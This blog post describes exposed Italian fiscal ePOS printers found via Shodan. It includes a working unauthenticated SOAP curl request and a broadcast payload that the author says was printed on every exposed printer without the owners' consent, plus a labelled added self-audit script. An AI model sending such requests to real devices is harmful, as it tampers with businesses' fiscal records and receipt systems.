Let's get fiscal - A short finding in exposed servers
This is just an introduction. I first noticed, at a hotel where I stayed about a year ago, that a specific server was exposed on the same Wi-Fi network that was available to customers. It was not the only one, but it was by far the most interesting to me.
Even after I told them, nothing has changed: after a year they still had everything exposed for all customers to see and use (such as their printer).
I will be updating this during the next 2 weeks.
[Update @Day2] What is this about
I can now tell you that the server was their ePOS server, the machine that prints their receipts. Not only that, but all the data from their receipts, from the day they started using that machine, was also publicly available.
I also looked into the manual for that machine: it exposes some API endpoints (using SOAP, which I don't like very much), and even a way to upload custom web apps in PHP to the machine (this I did not understand completely, but I will study it more).
I used the response I got from that server to do a search on Shodan, using the hash of the response (since it seemed to me that every instance of the same server should always give the same response). It returned ~250 servers exposed here in Italy.
Of course I planned to contact them all to let them know about their vulnerability. But first I wanted to test whether the API worked as I expected, so I had to find a nearby affected server. I found a couple (I live in a pretty big city) where I could test whether the API would work, since I planned to first try printing, on the exposed receipt servers, a message about the vulnerability and how to contact me for help if needed.
[Update @Day4] How to use the exposed server
First important problem: the web server of their ePOS machines exposes a recap of each day's transactions, and the SOAP endpoint also allows me to query the whole list of every single transaction ever made. It's slow, but it works.
Second problem: the SOAP endpoint also allows me to change configurations in the ePOS (name and logo of the store, which can be uploaded, and apparently some currency configs as well), print custom receipts, and show custom messages on the customer-facing screen.
Third problem: according to the official docs I found online, another endpoint allows me to upload PHP applications that are run on the machine each time a new transaction happens. I did not test this, though.
Fourth problem: I think I might be able to spam my personal code for the Italian "Lotteria degli Scontrini", a lottery where people can win actual money simply by paying with their card.
Today I finally went to a store impacted by this (nearby-ish to my office) and tested it personally: I could print a custom receipt with the text I wanted, and I could show a customized text on the customer-facing screen. I then talked to the store owner so that they knew what was happening, and why.
This is, by the way, the curl request I sent, with some data hidden:
curl --location 'http://{IP}:{PORT}/cgi-bin/fpmate.cgi' \
--header 'Content-Type: application/xml' \
--data '<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<printerFiscalReceipt>
<displayText operator="1" data="Ciao sto facendo un test!" />
<beginFiscalReceipt operator="1" />
<printRecMessage operator="1" messageType="4" message="Stampa di prova" />
<printRecItem operator="1" description="Oggetto molto magico" quantity="1" unitPrice="100" department="1" justification="1" />
<printRecTotal operator="1" description="Monete di rame" payment="100" paymentType="2" index="1" justification="1" />
<displayText operator="1" data="Fine della stampa di prova!" />
<endFiscalReceipt operator="1" />
</printerFiscalReceipt>
</s:Body>
</s:Envelope>
'
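For a store owner or admin who wants to verify that the printer is no longer reachable from the guest Wi-Fi, here is an added self-audit script (not part of the original post or the author's tooling). It assumes the printer serves the SOAP handler at the /cgi-bin/fpmate.cgi path shown in the request above, sends only a harmless GET, and reports whether the endpoint answers from the network you run it on.

```python
"""Self-audit: is a fiscal printer's SOAP endpoint reachable from this network?

Assumptions (not from the original post): the printer answers HTTP on the
host/port you pass in and serves the SOAP handler at /cgi-bin/fpmate.cgi, as
in the post's curl request. Only a harmless GET is sent; no fiscal commands.
"""
import socket
import urllib.error
import urllib.request

FPMATE_PATH = "/cgi-bin/fpmate.cgi"  # endpoint path taken from the post


def tcp_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def audit_printer(host: str, port: int, timeout: float = 2.0) -> dict:
    """Classify exposure of the ePOS web server as seen from the current network.

    Returns {'verdict': one of "isolated", "port-open", "endpoint-reachable",
    'status': HTTP status or None}. Any HTTP answer at all means the SOAP
    handler can be driven by anyone on this network (e.g. the guest Wi-Fi).
    """
    if not tcp_open(host, port, timeout):
        return {"verdict": "isolated", "status": None}
    req = urllib.request.Request(f"http://{host}:{port}{FPMATE_PATH}", method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return {"verdict": "endpoint-reachable", "status": resp.status}
    except urllib.error.HTTPError as e:
        # A 4xx/5xx still proves the printer's web server answers on this network
        return {"verdict": "endpoint-reachable", "status": e.code}
    except (urllib.error.URLError, OSError):
        # TCP port open but no usable HTTP answer (another service, or a hang)
        return {"verdict": "port-open", "status": None}


if __name__ == "__main__":
    import sys
    h, p = sys.argv[1], int(sys.argv[2])  # e.g. 192.0.2.10 80 (placeholder), run from the guest Wi-Fi
    print(audit_printer(h, p))
```

A verdict of "endpoint-reachable" from the guest network means the segmentation is missing; the fix is to move the printer to a VLAN the guest SSID cannot route to.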
Now I needed to contact all of the other affected ePOS owners. On the receipts I could find the store name and some other info (phone, VAT number), and I could, I think, have written some code that used that info to find emails to contact. But I decided to go all in with the receipts: I crafted a SOAP request that printed all of the useful info and a way to contact me (an anonymous alias to my Protonmail email), and wrote a simple Python script that spammed it to all the open servers.
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<printerFiscalReceipt>
<displayText operator="1" data="Questo è un avviso importante!" />
<printRecMessage operator="1" messageType="1" message="{a long explanatory message that specifies how this is NOT a ransom}" />
<printRecMessage operator="1" messageType="1" message="{that spans a lot of printRecMessages}" />
<printRecMessage operator="1" messageType="1" message="{and mentions a private alias of my protonmail email}" />
<printRecMessage operator="1" messageType="1" message="Buona giornata!" />
<displayText operator="1" data="Fine dell'avviso importante!" />
</printerFiscalReceipt>
</s:Body>
</s:Envelope>
The end
This project can be considered over for me: I got in, I got the info, I contacted the interested parties, and I can move on to another project. This was supposed to be the pilot for the 2-week projects, but it took me less time, so I'll simply move all the other projects forward one week and start the new one on Monday.
I was even able to start and finish another small project for my children in the meantime; I'll likely post about it this weekend.